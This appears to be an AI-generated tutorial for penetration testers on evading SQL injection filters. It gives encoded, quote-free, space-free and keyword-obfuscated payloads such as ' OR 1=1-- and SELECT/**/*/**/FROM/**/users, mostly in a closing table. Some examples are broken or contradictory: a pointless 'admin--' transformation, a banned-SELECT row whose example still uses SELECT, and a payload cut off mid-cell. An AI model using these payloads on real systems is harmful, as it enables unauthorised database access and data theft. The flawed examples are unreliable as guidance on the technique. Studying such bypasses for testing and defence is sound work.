Understanding SQL Injection Filter Evasion Techniques
This content is an AI-generated summary. If you encounter any misinformation or problematic content, please report it to cyb.hub@proton.me.
Modern web applications often implement defensive measures to sanitize or block common attack patterns, making simple SQL injection attempts ineffective. As penetration testers, we must adapt by using more sophisticated techniques to bypass these filters.
Key Points
- Character Encoding: Converting special characters in the SQL injection payload into encoded forms that may bypass input filters.
- No-Quote SQL Injection: Techniques to bypass filters that block single or double quotes.
- No Spaces Allowed: Methods to inject SQL when spaces are filtered out.
- Keyword Bypassing: Strategies to bypass filters that block common SQL keywords.
Character Encoding
Converting special characters in the SQL injection payload into encoded forms can help bypass input filters.
Encoding Techniques
- URL Encoding: For example, the payload
' OR 1=1--can be encoded as%27%20OR%201%3D1--. - Hexadecimal Encoding: For instance, the query
SELECT * FROM users WHERE name = 'admin'can be encoded asSELECT * FROM users WHERE name = 0x61646d696e. - Unicode Encoding: For example, the string
admincan be encoded as\u0061\u0064\u006d\u0069\u006e.
No-Quote SQL Injection
When the application filters single or double quotes or escapes, use the following techniques:
Techniques
- Using Numerical Values: Instead of injecting
' OR '1'='1, an attacker can useOR 1=1in a context where quotes are not necessary. - Using SQL Comments: The input
admin'--can be transformed intoadmin--, where the--signifies the start of a comment in SQL, effectively ignoring the remainder of the SQL statement. - Using CONCAT() Function: For example,
CONCAT(0x61, 0x64, 0x6d, 0x69, 0x6e)constructs the stringadmin.
No Spaces Allowed
When spaces are not allowed or are filtered out, consider the following methods:
Methods
- Comments to Replace Spaces: Instead of
SELECT * FROM users WHERE name = 'admin', an attacker can useSELECT/**//*FROM/**/users/**/WHERE/**/name/**/='admin'. - Tab or Newline Characters:
SELECT\t*\tFROM\tusers\tWHERE\tname\t=\t'admin'. - Alternate Characters: Using alternative URL-encoded characters representing different types of whitespace, such as
%09(horizontal tab),%0A(line feed),%0C(form feed),%0D(carriage return), and%A0(non-breaking space).
Keyword Bypassing
Strategies to bypass filters that block common SQL keywords:
Strategies
| Scenario | Description | Example |
|---|---|---|
| Keywords like SELECT are banned | SQL keywords can often be bypassed by changing their case or adding inline comments to break them up. | SElEcT * FrOm users or SE/**/LECT * FROM/**/users |
| Spaces are banned | Using alternative whitespace characters or comments to replace spaces can help bypass filters. | SELECT%0A*%0AFROM%0Ausers or SELECT/**/*/**/FROM/**/users |
| Logical operators like AND, OR are banned | Using alternative logical operators or concatenation to bypass keyword filters. | username = 'admin' && password = 'password' or `username = 'admin'/**/ |
| Common keywords like UNION, SELECT are banned | Using equivalent representations such as hexadecimal or Unicode encoding to bypass filters. | SElEcT * FROM users WHERE username = CHAR(0x61,0x64,0x6D,0x69,0x6E) |
| Specific keywords like OR, AND, SELECT, UNION are banned | Using obfuscation techniques to disguise SQL keywords by combining characters with string functions or comments. | SElECT * FROM users WHERE username = CONCAT('a','d','m','i','n') or SElEcT/**/username/**/FROM/**/users |
Learn More
To further enhance your understanding of SQL injection filter evasion techniques, consider exploring the following resources:
- OWASP SQL Injection Prevention Cheat Sheet: A comprehensive guide on preventing SQL injection attacks.
- SQL Injection Attack and Defense: A detailed book covering various aspects of SQL injection and defense mechanisms.
- Penetration Testing Labs: Practical labs and exercises to test and improve your SQL injection skills.